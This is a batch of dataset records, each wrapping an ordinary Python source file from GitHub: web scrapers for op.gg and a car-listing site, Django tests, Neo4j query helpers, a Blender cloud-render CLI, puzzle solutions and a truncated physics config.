f\"https://op.gg/multisearch/{region}?summoners={summoner_names}\"\n headers = { \n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36\" \n }\n\n req = requests.get(url, headers=headers)\n soup = BeautifulSoup(req.content, \"html.parser\")\n \n return json.loads(soup.select_one(\"#__NEXT_DATA__\").text)['props']['pageProps']\n \n \n @staticmethod\n def get_all_seasons(region = Region.NA, page_props: dict = None) -> list[SeasonInfo]:\n # TODO: SummonerFull might have this info, which would reduce the call out to get_page_props()\n \"\"\"\n Get all seasons from OPGG.\n\n ### Args:\n region : `Region, optional`\n Pass the region you want to search in. Defaults to \"NA\".\n \n page_props : `dict, optional`\n Pass the page props if the program has queried them once before.\\n\n Note: Defaults to None, but if you pass them it reduces the overhead of another request out to OPGG.\n\n ### Returns:\n `list[SeasonInfo]` : A list of SeasonInfo objects.\n \"\"\"\n \n # TODO: Revisit this caching logic, pretty sure there's a better way to do this\n if page_props == None and not OPGG.cached_page_props:\n page_props = OPGG.get_page_props(region)\n OPGG.cached_page_props = page_props\n \n elif OPGG.cached_page_props:\n page_props = OPGG.cached_page_props\n \n seasons = []\n for season in dict(page_props['seasonsById']).values():\n seasons.append(SeasonInfo(\n id = season[\"id\"],\n value = season[\"value\"],\n display_value = season[\"display_value\"],\n is_preseason = season[\"is_preseason\"]\n ))\n \n return seasons\n\n\n @staticmethod\n def get_season_by(by: By, value: int | str | list) -> SeasonInfo | list[SeasonInfo]:\n \"\"\"\n Get a season by a specific metric.\n \n ### Args:\n by : `By`\n Pass a By enum to specify how you want to get the season(s).\n \n value : `int | str | list`\n Pass the value(s) you want to search by. (id, display_value, etc.)\n \n ### Returns:\n `SeasonInfo | list[SeasonInfo]` : A single or list of SeasonInfo objects.\n \"\"\"\n \n all_seasons = OPGG.get_all_seasons()\n result_set = []\n \n if by == By.ID:\n if isinstance(value, list):\n for season in all_seasons:\n for id in value:\n if season.id == id:\n result_set.append(season)\n else:\n for season in all_seasons:\n if season.id == int(value):\n result_set.append(season)\n \n # TODO: perhaps add more ways to get season objs, like by is_preseason, or display_name, etc. \n \n return result_set if len(result_set) > 1 else result_set[0]\n \n \n @staticmethod\n def get_all_champions(region = Region.NA, page_props: dict = None) -> list[Champion]:\n \"\"\"\n Get all champion info from OPGG.\\n\n Page props method will be deprecated very soon in favour of simply pinging a champion endpoint I found.\n\n ### Args:\n region : `Region, optional`\n Pass the region you want to search in. Defaults to \"NA\".\n \n page_props : `dict, optional`\n Pass the page props if the program has queried them once before.\\n\n Note: Defaults to None, but if you pass them it reduces the overhead of another request out to OPGG.\n\n Returns:\n `list[Champion]` : A list of Champion objects.\n \"\"\"\n # TODO: Revisit this caching logic, pretty sure there's a better way to do this\n if page_props == None and not OPGG.cached_page_props:\n # pass any valid username here, it doesnt matter.\n # we just need the page props, and we dont get them without an actual user\n page_props = OPGG.get_page_props(region)\n OPGG.cached_page_props = page_props\n \n elif OPGG.cached_page_props:\n page_props = OPGG.cached_page_props\n \n champions = []\n \n for champion in dict(page_props[\"championsById\"]).values():\n # reset per iteration\n _spells = []\n _skins = []\n \n for skin in champion[\"skins\"]:\n _prices = []\n \n if skin[\"prices\"]:\n for price in skin[\"prices\"]:\n _prices.append(Price(\n currency = price[\"currency\"] if \"RP\" in price[\"currency\"] else \"BE\",\n cost = price[\"cost\"]\n ))\n else:\n _prices = None\n \n _skins.append(Skin(\n id = skin[\"id\"],\n name = skin[\"name\"],\n centered_image = skin[\"centered_image\"],\n skin_video_url = skin[\"skin_video_url\"],\n prices = _prices,\n sales = skin[\"sales\"]\n ))\n \n for spell in champion[\"spells\"]:\n _spells.append(Spell(\n key = spell[\"key\"],\n name = spell[\"name\"],\n description = spell[\"description\"],\n max_rank = spell[\"max_rank\"],\n range_burn = spell[\"range_burn\"],\n cooldown_burn = spell[\"cooldown_burn\"],\n cost_burn = spell[\"cost_burn\"],\n tooltip = spell[\"tooltip\"],\n image_url = spell[\"image_url\"],\n video_url = spell[\"video_url\"]\n )) \n \n champions.append(Champion(\n id = champion[\"id\"],\n key = champion[\"key\"],\n name = champion[\"name\"],\n image_url = champion[\"image_url\"],\n evolve = champion[\"evolve\"],\n passive = Passive(\n name = champion[\"passive\"][\"name\"],\n description = champion[\"passive\"][\"description\"],\n image_url = champion[\"passive\"][\"image_url\"],\n video_url = champion[\"passive\"][\"video_url\"]\n ),\n spells = _spells,\n skins = _skins\n )) \n \n return champions\n \n \n @staticmethod\n def get_champion_by(by: By, value: int | str | list, **kwargs) -> Champion | list[Champion]:\n \"\"\"\n Get a single or list of champions by a specific metric.\n \n ### Args:\n by : `By`\n Pass a By enum to specify how you want to get the champion(s).\n \n value : `int | str | list`\n Pass the value(s) you want to search by. (id, key, name, etc.)\n \n **kwargs : `any`\n Pass any additional keyword arguments to narrow down the search.\\n\n Note: Currently only supports \"currency\" for the cost of a champion.\\n\n \n Example: \n `get_champion_by(By.COST, 450, currency=By.BLUE_ESSENCE)`\n \"\"\"\n # Currently kwargs only handles \"currency\" for the cost of a champion,\n # but I might introduce other metrics of getting champ objs later, idk...\n all_champs = OPGG.get_all_champions()\n result_set = []\n \n if by == By.ID:\n if isinstance(value, list):\n for champ in all_champs:\n for id in value:\n if champ.id == id:\n result_set.append(champ)\n else:\n for champ in all_champs:\n if champ.id == int(value):\n result_set.append(champ)\n \n elif by == By.KEY:\n if isinstance(value, list):\n for champ in all_champs:\n for key in value:\n if champ.key == key:\n result_set.append(champ)\n else:\n for champ in all_champs:\n if champ.key == value:\n result_set.append(champ)\n \n elif by == By.NAME:\n if isinstance(value, list):\n for champ in all_champs:\n for name in value:\n if champ.name == name:\n result_set.append(champ)\n else:\n for champ in all_champs:\n if champ.name == value:\n result_set.append(champ)\n \n elif by == By.COST:\n for champ in all_champs:\n if champ.skins[0].prices:\n for price in champ.skins[0].prices:\n if str(kwargs[\"currency\"]).upper() == price.currency and price.cost in value:\n result_set.append(champ)\n \n \n # if the result set is larger than one, return the whole list, otherwise just return the object itself.\n return result_set if len(result_set) > 1 else result_set[0]","repo_name":"ShoobyDoo/OPGG.py","sub_path":"opgg/opgg.py","file_name":"opgg.py","file_ext":"py","file_size_in_byte":27367,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"50"} +{"seq_id":"14130947860","text":"# L -> B\r\n\r\n# B: 4,3\r\n# L: 9,6\r\n# R: 6,6\r\n# -> 7\r\n\r\n# B: 2,3\r\n# L: 8,2\r\n# R: 5,2\r\n# -> 6\r\nfrom collections import deque\r\n\r\ndef bfs(grid, start, end, block):\r\n rows, cols = len(grid), len(grid[0])\r\n visited = [[False for _ in range(cols)] for _ in range(rows)]\r\n queue = deque([(start, 0)]) # (position, distance)\r\n visited[start[0]][start[1]] = True\r\n\r\n while queue:\r\n (x, y), dist = queue.popleft()\r\n if (x, y) == end:\r\n return dist - 1 # Subtract 1 because L and B are not counted\r\n\r\n for dx, dy in [(1, 0), (-1, 0), (0, 1), (0, -1)]:\r\n nx, ny = x + dx, y + dy\r\n if 0 <= nx < rows and 0 <= ny < cols and not visited[nx][ny] and grid[nx][ny] != block:\r\n visited[nx][ny] = True\r\n queue.append(((nx, ny), dist + 1))\r\n\r\n return -1 # Path not found\r\n\r\ndef find_positions(grid):\r\n for i in range(len(grid)):\r\n for j in range(len(grid[0])):\r\n if grid[i][j] == 'L':\r\n start = (i, j)\r\n elif grid[i][j] == 'B':\r\n end = (i, j)\r\n return start, end\r\n\r\ndef main(grid):\r\n start, end = find_positions(grid)\r\n return bfs(grid, start, end, 'R')\r\n\r\n# 사용자로부터 격자 입력 받기\r\ngrid = []\r\nfor _ in range(10):\r\n row = input()\r\n grid.append(row)\r\n\r\n# 결과 출력\r\nprint(main(grid))","repo_name":"hoonkiyeo/codetree-TILs","sub_path":"231217/L, R 그리고 B/l-r-and-b.py","file_name":"l-r-and-b.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"4915989636","text":"from django.test import TestCase\n\n# Create your tests here.\nfrom urllib import response\nfrom django.urls import resolve\nfrom django.test import TestCase\nfrom lists.views import home_page, new_list, view_list\nfrom django.template.loader import render_to_string\nfrom lists.models import Item, List \n\n# Create your tests here.\nclass HomePageTest(TestCase):\n def test_root_url_resolves_to_home_page(self) -> None:\n found = resolve('/')\n self.assertEqual(found.func, home_page)\n\n \"\"\"\n def test_home_page_returns_correct_html(self) -> None:\n request = HttpRequest() #this is a request object that we manually created to our view\n response = home_page(request) #resolves into a HttpResponse object\n html = response.content.decode('utf-8')\n self.assertTrue(html.startswith(''))\n self.assertin('To-Do', html)\n self.assertTrue(html.endswith(''))\n\n we can also render our template here\n expected_response = render_to_string('home.html')\n self.assertEqual(html, expected_response)\n\n \"\"\"\n\n def test_home_page_returns_correct_html(self) -> None:\n response = self.client.get('/')\n self.assertTemplateUsed(response, 'home.html')\n \n # def test_can_save_a_POST_request(self) -> None:\n # self.client.post('/', data = {'item_text': 'A new item list'})\n # self.assertEqual(Item.objects.count(), 1)\n # new_item = Item.objects.first()\n # self.assertEqual(new_item.text, 'A new item list')\n\n # def test_redirects_afeter_a_POST(self) -> None:\n # response = self.client.post('/', data = {'item_text': 'A new item list'})\n # self.assertRedirects(response, '/lists/the-only-list-in-the-world/')\n\nclass ListViewTest(TestCase):\n\n def test_uses_list_template(self) -> None:\n list = List.objects.create()\n response = self.client.get(f'/lists/{list.id}/')\n self.assertTemplateUsed(response, 'list.html')\n\n def test_displays_only_items_for_that_list(self) -> None:\n correct_list = List.objects.create()\n Item.objects.create(text = 'Itemey 1', list = correct_list)\n Item.objects.create(text = 'Itemey 2', list = correct_list)\n other_list = List.objects.create()\n Item.objects.create(text = 'other list item 1', list = other_list)\n Item.objects.create(text = 'other list item 2', list = other_list)\n\n response = self.client.get(f'/lists/{correct_list.id}/')\n\n self.assertContains(response, 'Itemey 1')\n self.assertContains(response, 'Itemey 2')\n self.assertNotContains(response, 'other list item 1')\n self.assertNotContains(response, 'other list item 2')\n\n\nclass NewListItems(TestCase):\n def test_url_resolves_to_fucntion(self) -> None:\n found = resolve('/lists/new')\n self.assertEqual(found.func, new_list)\n\n def test_can_save_a_POST_request(self) -> None:\n self.client.post('/lists/new', data={'item_text': 'A new list item'})\n self.assertEqual(Item.objects.count(), 1)\n new_item = Item.objects.all()[0]\n self.assertEqual(new_item.text, 'A new list item')\n\n def test_Redirect_after_a_POST(self) -> None:\n response = self.client.post('/lists/new', data = { 'item_text': 'A new list item'})\n new_list = List.objects.first()\n self.assertRedirects(response, f'/lists/{new_list.id}/')\n\nclass NewItemTest(TestCase):\n\n def test_can_save_request_to_an_existing_list(self):\n other_list = List.objects.create()\n correct_list = List.objects.create()\n\n self.client.post(f'/lists/{correct_list.id}/add_item',\n data={'item_text': 'A new item for an existing list'}\n )\n\n self.assertEqual(Item.objects.count(), 1)\n new_item = Item.objects.first()\n self.assertEqual(new_item.text, 'A new item for an existing list')\n self.assertEqual(new_item.list, correct_list)\n\n def test_redirects_to_list_view(self):\n other_list = List.objects.create()\n correct_list = List.objects.create()\n\n response = self.client.post(f'/lists/{correct_list.id}/add_item',\n data={'item_text': 'A new item for an existing list'}\n )\n\n self.assertRedirects(response, f'/lists/{correct_list.id}/')\n\n def test_passes_correct_list_to_the_template(self) -> None:\n other_list = List.objects.create()\n correct_list = List.objects.create()\n response = self.client.get(f'/lists/{correct_list.id}/')\n self.assertEqual(response.context['list'], correct_list )\n\n\n\nclass ListAndItemModelsTest(TestCase):\n \n def test_saving_and_retrieving_items(self) -> None:\n list_ = List() #the name of the table is the name of the class \n list_.save()\n\n first_item = Item()\n first_item.text = 'The First (ever) list item'\n first_item.list = list_ \n first_item.save()\n\n second_item = Item()\n second_item.text = 'Item the second'\n second_item.list = list_\n second_item.save()\n\n saved_list = List.objects.first()\n self.assertEqual(saved_list, list_)\n\n saved_items = Item.objects.all()\n self.assertEqual(saved_items.count(), 2)\n \n first_saved_item = saved_items[0]\n second_saved_item = saved_items[1]\n self.assertEqual('The First (ever) list item', first_saved_item.text )\n self.assertEqual(first_saved_item.list, list_)\n self.assertEqual('Item the second', second_saved_item.text )\n self.assertEqual(second_saved_item.list, list_)\n","repo_name":"CoDedArch/Todo-List-TDD","sub_path":"lists/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"37737553999","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# author: Olivier Noguès\r\n\r\n\r\nimport json\r\nimport io\r\nimport zipfile\r\nfrom ares.Lib import AresImports\r\n\r\nfrom ares.Lib.html import AresHtml\r\n\r\n# External package required\r\nrender_template_string = AresImports.requires(name='flask', reason='URL remappings', install='No need to install', package='render_template_string', raiseExcept=False, sourceScript=__file__)\r\nurl_for = AresImports.requires(name='flask', reason='URL remappings', install='No need to install', package='url_for', raiseExcept=False, sourceScript=__file__)\r\n\r\n\r\nclass DownloadMemoryZip(AresHtml.Html):\r\n \"\"\"\r\n\r\n TODO Find a way to send the in memory file form a report: data: %(archive)s,\r\n \"\"\"\r\n alias, cssCls = 'anchorFMemory', ['btn', 'btn-success']\r\n references = ['https://newseasandbeyond.wordpress.com/2014/01/27/creating-in-memory-zip-file-with-python/']\r\n reqCss = ['bootstrap', 'font-awesome']\r\n file_location = 'data'\r\n\r\n def __init__(self, aresObj, vals, fileName, cssCls=None, cssAttr=None):\r\n super(DownloadMemoryZip, self).__init__(aresObj, vals, cssCls, cssAttr)\r\n self.fileName = fileName\r\n self.memory_file = io.BytesIO()\r\n self.zf = zipfile.ZipFile(self.memory_file, mode='w', compression=zipfile.ZIP_DEFLATED)\r\n\r\n def add(self, data, filename):\r\n \"\"\" Add the content of string to a file in the in-memory package\r\n\r\n :param data: The data\r\n :param filename: The filename\r\n :return:\r\n \"\"\"\r\n self.zf.writestr(filename, data)\r\n\r\n def namelist(self):\r\n \"\"\" Return the list of files in the in-memory zip archive\r\n\r\n :return:\r\n \"\"\"\r\n return self.zf.namelist()\r\n\r\n def __str__(self):\r\n \"\"\" The HTML object representation \"\"\"\r\n url = render_template_string('''{{ url_for(\\'ares.downloadMemory\\') }}''')\r\n self.aresObj.jsOnLoadFnc.add('''\r\n $('#%(htmlId)s').click(function() {\r\n $.ajax({\r\n url: %(url)s,\r\n type: \"POST\",\r\n contentType: attr( \"enctype\", \"multipart/form-data\" ),\r\n data: %(archive)s,\r\n success: success\r\n });\r\n });\r\n ''' % {'htmlId': self.htmlId, 'url': url, 'archive': self.zf})\r\n return '' % (self.strAttr(), self.vals)\r\n\r\n\r\nclass DropFile(AresHtml.Html):\r\n __reqCss, __reqJs = ['bootstrap', 'font-awesome'], ['bootstrap']\r\n __pyStyle = ['CssDropFile']\r\n name, category, inputType, callFnc, docCategory = 'Drop File Area', 'Input', \"file\", 'dropfile', 'Advanced'\r\n\r\n def __init__(self, aresObj, vals, tooltip, report_name, fileType):\r\n super(DropFile, self).__init__(aresObj, vals)\r\n self.tooltip(tooltip, location='bottom')\r\n self.report_name, self.dataType = report_name if report_name is not None else self.aresObj.run.report_name, fileType\r\n for action in [\"dragover\", \"dragleave\", \"dragenter\"]:\r\n self.jsFrg(action, \"event.originalEvent.preventDefault(); event.originalEvent.stopPropagation(); event.originalEvent.dataTransfer.dropEffect = 'copy';\")\r\n self.css( {\"display\": \"inline-block\", \"width\": '100%'})\r\n\r\n @property\r\n def jsQueryData(self): return {}\r\n\r\n def drop(self, url=None, jsData=None, jsFncs=None, httpCodes=None, isPyData=True, refresh=True, extensions=None):\r\n data = []\r\n if url is None:\r\n url = \"%s/upload/OUTPUTS/%s\" % (self.aresObj._urlsApp['ares-transfer'], self.report_name)\r\n if jsFncs is None:\r\n jsFncs = [ self.aresObj.jsReloadPage() ]\r\n elif not isinstance(jsFncs, list):\r\n jsFncs = [jsFncs]\r\n\r\n if jsData is not None:\r\n for rec in jsData:\r\n if isinstance(rec, tuple):\r\n if isPyData:\r\n data.append( \"data.append('%s', %s)\" % (rec[0], json.dumps(rec[1])) )\r\n else:\r\n data.append(\"data.append('%s', %s)\" % (rec[0], rec[1]))\r\n else:\r\n data.append(\"data.append('%s', %s)\" % (rec.htmlCode, rec.val))\r\n super(DropFile, self).drop('''\r\n event.originalEvent.preventDefault(); event.originalEvent.stopPropagation();\r\n var files = event.originalEvent.dataTransfer.files; var data = new FormData();\r\n $.each(event.originalEvent.dataTransfer.files, function(i, file) { \r\n var fileExt = '.' + file.name.split('.').pop() ;\r\n if ( %(extensions)s == null ) { data.append(file.name, file) ; } else {\r\n if (%(extensions)s.indexOf( fileExt ) >= 0) { data.append(file.name, file) ; } } });\r\n %(jsData)s; %(ajax)s; ''' % {\"jsData\": \";\".join(data), \"extensions\": json.dumps(extensions),\r\n \"ajax\": self.aresObj.jsAjax(url, success=\";\".join(jsFncs) if refresh else '' ) })\r\n return self\r\n\r\n def __str__(self):\r\n return '''\r\n
  %(vals)s
\r\n \r\n ''' % {'htmlId': self.htmlId, 'strAttr': self.strAttr(pyClassNames=self.__pyStyle), 'vals': self.vals, 'envs': self.report_name}\r\n\r\n\r\n","repo_name":"jeamick/ares-visual","sub_path":"Lib/html/AresHtmlFiles.py","file_name":"AresHtmlFiles.py","file_ext":"py","file_size_in_byte":5020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"14602994437","text":"def get_query_for_create_node(node, node_name='node'):\n return f'CREATE ({node_name}:{node.type}{get_string_params_from_dict(node.params)})'\n\n\ndef get_query_for_match_node(node, node_name='node', return_result=True):\n query = f'MATCH ({node_name}'\n if node.type:\n query += f': {node.type}'\n query += ')'\n if node.params:\n query += '\\nWHERE'\n for key in list(node.params)[:-1]:\n query += f' {node_name}.{str(key)} = \"{node.params[key]}\" AND'\n last_key = list(node.params)[-1]\n query += f' {node_name}.{last_key} = \"{node.params[last_key]}\"'\n if return_result:\n query += f'\\nreturn {node_name}'\n return query\n\n\ndef get_query_for_creating_couple(node1, edge, node2):\n query = get_query_for_match_node(node1, node_name='node1', return_result=False) + ' \\n'\n query += get_query_for_match_node(node2, node_name='node2', return_result=False) + ' \\n'\n query += f'CREATE (node1)-[:{edge.type}{get_string_params_from_dict(edge.params)}]->(node2)'\n return query\n\n\ndef get_query_for_merging_couple(node1, edge, node2):\n query = get_query_for_match_node(node1, node_name='node1', return_result=False) + ' \\n'\n query += get_query_for_match_node(node2, node_name='node2', return_result=False) + ' \\n'\n query += f'MERGE (node1)-[:{edge.type}{get_string_params_from_dict(edge.params)}]->(node2)'\n return query\n\n\ndef get_query_for_check_edge(node1, edge, node2):\n query = get_query_for_match_node(node1, node_name='node1', return_result=False) + '\\n'\n query += get_query_for_match_node(node2, node_name='node2', return_result=False) + '\\n'\n query += f'MATCH (node1)-[:{edge.type}{get_string_params_from_dict(edge.params)}]->(node2)\\n'\n query += 'RETURN node1, node2'\n return query\n\n\ndef get_string_params_from_dict(params: dict) -> str:\n string_params = '{'\n if params:\n for key in list(params)[:-1]:\n par = f'\"{params[key]}\"' if type(params[key]) == str else f'{str(params[key])}'\n string_params += str(key) + f': {par},'\n last_key = list(params)[-1]\n par = f'\"{params[last_key]}\"' if type(params[last_key]) == str else f'{str(params[last_key])}'\n string_params += str(last_key) + f':{par}'\n string_params += '}'\n return string_params\n\n\ndef get_query_for_match_node_in_couple(match_node, edge, other_node, revert=False):\n match_node_name = 'node1'\n other_node_name = 'node2'\n query = get_query_for_match_node(match_node, node_name=match_node_name, return_result=False) + '\\n'\n query += get_query_for_match_node(other_node, node_name=other_node_name, return_result=False) + '\\n'\n if revert:\n match_node_name, other_node_name = other_node_name, match_node_name\n\n query += f'MATCH (node1)-[:{edge.type}{get_string_params_from_dict(edge.params)}]->(node2)\\n'\n query += f'RETURN {match_node_name}'\n\n return query\n","repo_name":"Nutrymaco/catalog","sub_path":"neo4j_utils/graph_utils.py","file_name":"graph_utils.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"18851593888","text":"import context\nimport argparse\nimport colorama\nfrom colorama import Fore, Style\nfrom src.render_job_list import RenderJobList\nfrom src.render_job import RenderJob\nfrom src.render_manager import RenderManager\nfrom src.render_environment import RenderEnvironment\nfrom src.render_packer import RenderPacker\nfrom src.batch_manager import BatchManager\nfrom src.blob_manager import BlobManager\nfrom src.stack_config_manager import StackConfigManager\nfrom src.render_job_status import RenderJobStatus\n\ndef parse_args():\n parser = argparse.ArgumentParser('Manages cloud renders')\n parser.add_argument('command', type=str)\n parser.add_argument('-j', '--jobfile', required=False, type=str, default='joblist.csv')\n parser.add_argument('-b', '--blend', required=False, type=str, default=None)\n parser.add_argument('-a', '--additionalfile', required=False, action='append')\n parser.add_argument('-S', '--scene', required=False, type=str, default=\"Scene\")\n parser.add_argument('-x', '--xres', required=False, type=int, default=1920)\n parser.add_argument('-y', '--yres', required=False, type=int, default=1080)\n parser.add_argument('-p', '--percentage', required=False, type=int, default=100)\n parser.add_argument('-s', '--samples', required=False, type=int)\n parser.add_argument('-t', '--step', required=False, type=int, default=1)\n parser.add_argument('-f', '--startframe', required=False, type=int, default=1)\n parser.add_argument('-e', '--endframe', required=False, type=int, default=-1)\n parser.add_argument('-k', '--breaksize', required=False, type=int, default=-1)\n parser.add_argument('-d', '--description', required=False, type=str)\n parser.add_argument('-r', '--dryrun', required=False, type=str, default='False')\n parser.add_argument('--dates', required=False, type=str, default='False')\n parser.add_argument('--stackname', required=False, type=str)\n parser.add_argument('--large', required=False, type=str, default='False')\n \n return parser.parse_args()\n\ndef load(args):\n return RenderJobList.load(args.jobfile)\n\ndef validate_add(args):\n pass\n\ndef command_add(args):\n validate_add(args)\n jobs = load(args)\n\n packer = RenderPacker() \n\n job = RenderJob()\n job.source_blend_path = args.blend\n job.package = packer.pack(args.blend, args.additionalfile)\n job.description = args.description\n job.additional_file_count = len(args.additionalfile) if args.additionalfile != None else 0\n job.scene = args.scene\n job.startframe = args.startframe\n job.endframe = args.endframe\n job.step = args.step\n job.xres = args.xres\n job.yres = args.yres\n job.samples = args.samples\n job.percentage = args.percentage\n job.use_large_disk = truthy(args.large)\n\n job.prepare()\n\n if args.breaksize >= 1:\n if job.startframe < 1 or job.endframe < 1:\n raise Exception(\"Can only break a job if -f/--startframe and -e/--endframe are specified.\")\n job.break_job(args.breaksize)\n\n job.describe(True)\n jobs.rootjobs.append(job)\n jobs.save()\n\ndef command_break(args):\n if not args.breaksize > 0:\n raise Exception(\"Break size not specified.\")\n\n jobs = load(args)\n\n rootjobs = jobs.rootjobs.copy()\n for job in rootjobs:\n if not any(job.children) or job.status != RenderJobStatus.Pending:\n print(\"Breaking job...\")\n job.break_job(args.breaksize)\n job.describe(True)\n jobs.save()\n\ndef command_process(args):\n jobs = load(args)\n manager = get_manager()\n manager.process_list(jobs, is_dry_run(args))\n\ndef command_describe(args):\n jobs = load(args)\n jobs.describe(dates=truthy(args.dates))\n\ndef command_init(args):\n jobs = RenderJobList()\n jobs.save_as(args.jobfile)\n jobs.describe()\n\ndef command_configure(args):\n if not args.stackname:\n raise Exception('--stackname is required.')\n\n scm = StackConfigManager()\n outputs = scm.get_outputs(args.stackname)\n\n env = RenderEnvironment.from_stack_outputs(outputs)\n env.save()\n print('Configuration saved.')\n\n\ndef is_dry_run(args):\n return args.dryrun in ['true', 'TRUE', 'True']\n\ndef truthy(arg):\n return arg in ['true', 'TRUE', 'True']\n\ndef get_manager():\n env = get_environment()\n return RenderManager(env, BatchManager(env), BlobManager(env))\n\ndef get_environment():\n return RenderEnvironment.load() \n \ndef do_main():\n colorama.init()\n args = parse_args()\n if args.command == 'add':\n command_add(args)\n elif args.command == 'describe':\n command_describe(args)\n elif args.command == 'process':\n command_process(args)\n elif args.command == 'init':\n command_init(args)\n elif args.command == 'configure':\n command_configure(args)\n elif args.command == 'break':\n command_break(args)\n\nif __name__ == '__main__':\n try:\n do_main()\n finally:\n print(Fore.RESET + Style.RESET_ALL)\n\n\n ","repo_name":"petetaxi-test/AwsBatchBlender","sub_path":"rendercli/src/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":4951,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"50"} +{"seq_id":"16066927448","text":"#!/usr/bin/python3\n'''Python Module'''\n\n\ndef minOperations(n):\n '''Script to calculate the minimun number of ops needed'''\n number_ops = 0\n idx = 2\n # We try to reduce n to 1\n while n > 1:\n if (n % idx == 0):\n # We acumulate the number of operations needed\n number_ops += idx\n # And reduce n\n n = n / idx\n else:\n idx += 1\n return number_ops\n","repo_name":"dlscoccia/holbertonschool-interview","sub_path":"0x03-minimum_operations/0-minoperations.py","file_name":"0-minoperations.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"18507752633","text":"from flask import Flask, render_template, request\nfrom selenium import webdriver\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom selenium.webdriver.common.by import By\nimport time\nimport os\nimport csv\n\n\napp = Flask(__name__)\n\n\ndef update_cars():\n if not os.path.exists('cars.csv') or (time.time()- os.path.getmtime('cars.csv')) > 600:\n browser = webdriver.Chrome(f\"{os.getcwd()}/chromedriver.exe\")\n time.sleep(2)\n next_page = True\n car_list = []\n link= 'https://www.sahibinden.com/arazi-suv-pickup-citroen-c3-aircross-1.5-bluehdi-feel'\n while next_page:\n browser.get(link)\n time.sleep(2)\n cars = browser.find_elements(by=By.CSS_SELECTOR,value='.searchResultsItem')\n for c in cars:\n if c.get_attribute('data-id') is None:\n \"\"\" for advertisement not taken \"\"\"\n continue\n else:\n infos= c.find_elements(by= By.CSS_SELECTOR, value='.searchResultsAttributeValue')\n price = c.find_elements(by=By.CSS_SELECTOR, value='.searchResultsPriceValue')\n location = c.find_elements(by=By.CSS_SELECTOR, value='.searchResultsLocationValue')\n car_list.append({'year': int(float(infos[0].text)),\n 'km': int(infos[1].text.replace('.','')),\n 'calor': infos[2].text,\n 'price': int(price[0].text.replace('.','').replace('TL','')),\n 'location': location[0].text.replace('\\n',' ')})\n\n time.sleep(3)\n next_link = browser.find_elements(by= By.CSS_SELECTOR, value = '.prewNextBut')\n next_page = False if len(next_link)== 0 else True\n for n in next_link:\n if n.get_attribute('title')== 'Sonraki':\n link = n.get_attribute('href')\n next_page= True\n\n else:\n next_page = False\n\n\n browser.close()\n with open('cars.csv', 'w', newline='') as f:\n writer = csv.writer(f)\n writer.writerow(['year','km','calor','price','location'])\n for car in car_list:\n writer.writerow([car['year'], car['km'],car['calor'],car['price'], car['location']])\n\n else:\n car_list = []\n with open('cars.csv','r') as f:\n reader = csv.reader(f)\n for row in reader:\n try:\n car_list.append({'year': int(row[0]),\n 'km': int(row[1]),\n 'calor': (row[2]),\n 'price': int(row[3]),\n 'location': (row[4])})\n except:\n continue\n\n return car_list\n@app.route('/image.jpg')\ndef image():\n car_list = update_cars()\n plt.figure(figsize= (10,8))\n plt.xLabel ('KM'),\n plt.yLabel('Price')\n plt.title('Car Data From Sahibinden')\n plt.scatter(list(map(lambda x: x['km'],car_list)), list(map(lambda x: x['price'], car_list)))\n plt.savefig('image.jpg')\n return open('image.jpg','rb').read()\n\n@app.route('/')\ndef index():\n car_list = update_cars()\n return render_template('index.html', title='Data From Sahibinden', cars=car_list)\n\n\nif __name__ == '__main__':\n app.run()\n\n\n","repo_name":"sedanurakcil/DataVisualizationProjects","sub_path":"cars_sahibinden/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"70174719195","text":"from aocd import get_data, submit\n\nimport re\n\nfrom elfcode import *\n\n\ndef day19(submit_answer=False):\n data = get_data(day=19, year=2018).split(\"\\n\")\n\n registers = [0] * 6\n ip_register = int(re.findall(\"(\\\\d)+\", data[0])[0])\n program_data = data[1::]\n\n for i, line in enumerate(program_data):\n opcode, *args = line.split()\n program_data[i] = (opcode, *map(int, args))\n\n while registers[ip_register] < len(program_data):\n opcode, *args = program_data[registers[ip_register]]\n opcodes[opcode](registers, *args)\n registers[ip_register] += 1\n\n answer1 = registers[0]\n\n registers = [0] * 6\n registers[0] = 1\n\n while registers[0] != 0:\n opcode, *args = program_data[registers[ip_register]]\n opcodes[opcode](registers, *args)\n registers[ip_register] += 1\n\n number = max(registers)\n\n answer2 = 0\n for factor in range(1, number + 1):\n if number % factor == 0:\n answer2 += factor\n\n if submit_answer:\n submit(answer1, 1, day=19, year=2018)\n submit(answer2, 2, day=19, year=2018)\n return answer1, answer2\n","repo_name":"davchoo/AdventOfCode2018","sub_path":"day_19_2018.py","file_name":"day_19_2018.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"40202589300","text":"import FWCore.ParameterSet.Config as cms\n\n#from L1Trigger.L1TMuonEndCap.fakeEmtfParams_cff import *\n\nfrom CondCore.CondDB.CondDB_cfi import CondDB\nCondDB.connect = cms.string('oracle://cms_orcon_prod/CMS_CONDITIONS')\n\nl1emtfparProtodb = cms.ESSource(\"PoolDBESSource\",\n CondDB,\n toGet = cms.VPSet(\n cms.PSet(\n record = cms.string('L1TMuonEndCapParamsRcd'),\n tag = cms.string('L1TMuonEndCapParamsPrototype_Stage2v0_hlt')\n )\n 